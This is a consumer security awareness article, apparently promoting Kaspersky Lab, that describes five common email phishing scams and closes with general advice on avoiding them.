Everyone should know by now that there are, sadly, no members of deposed African royal families who want to share millions of dollars with you, no strings attached. What everyone needs to know, however, is that the underlying principals of email phishing scams like that oldie but goodie are alive and well.
According to Kaspersky Lab research (securelist.com), 3.4 percent of all emails in 2012 had malicious attachments. If that doesn’t sound like a lot, consider how many emails you get each week —you’re going to get a lot of dangerous emails at that rate.
These five popular email scams disguise themselves to have come from legitimate, trusted sources, tricking their recipients into opening the emails and clicking on harmful links or downloading malicious attachments.
- Password Change Alerts: One of the more common scams that is approaching Nigerian Millions oldie but goodie status is the password reset confirmation email scam. In this, users get fake notifications from an email, social media, bank or some other online service alerting them that their account has been hacked and they need to reset their password. Users are then prompted to open an attachment in which they fill out their username and new password and/or PIN numbers. These attachments not only steal the information entered, but can also steal any username/password combination used on the now-infected machine.
- Bogus Bookings: Newer to the spam/phishing game are fake emails that appear to come from major airlines and hotel chains confirming fake reservations. These scams induce alarmed recipients to click on malicious links or attachments; once the user clicks on the link or attachment they are sent to a hacked site that in turn redirects the user to malicious sites full of harmful code that can exploit the user’s machine.
- Holidays/Tragedies: Holidays and tragedies are great opportunities for scammers because everybody gets emails at these times from people they may not directly know — charities soliciting donations for Hurricane Sandy victims, for instance, or companies offering you the opportunity to rent a Santa for a company Christmas party. Don’t open these attachments either, they will operate similarly to the bogus booking scams.
- You’re in a Crazy Facebook Video!: No, you’re not. But when user accounts get hacked on Twitter or Facebook they can be hijacked to send messages to users like “OMG/LMAO somebody was taping you!,” prompting users to click on the embedded link to see their supposedly embarrassing moment now made public. What they get is a bogus warning that they’re media player is out of date, prompting them to download the necessary update. But when they click through, instead of downloading a software update they get malware that can steal sensitive data from their machine or smartphone.
- Good Site, Bad Link: Kaspersky Lab experts have even found malicious links on legitimate sites like Wikipedia and Amazon that allow users to create pages within the sites. Malicious links on these sites have the potential to lead unsuspecting users to sites with harmful code once the links are clicked on, but these sites are also very good at promptly removing any such bogus pages, so the number of these is threats is relatively low — but alarming.
The best way to avoid falling for phishing email scams is to always be extremely suspicious of any email asking for personal information, even if it supposedly comes from a trusted or reputable source. Never download attachments from unknown sources, and consider long and hard before you download attachments even from reputable senders.
Finally, the best way to protect your system is to utilize a strong antivirus program like that offered by Kaspersky Lab and to keep all software programs, operating systems and web browsers on your system up to date.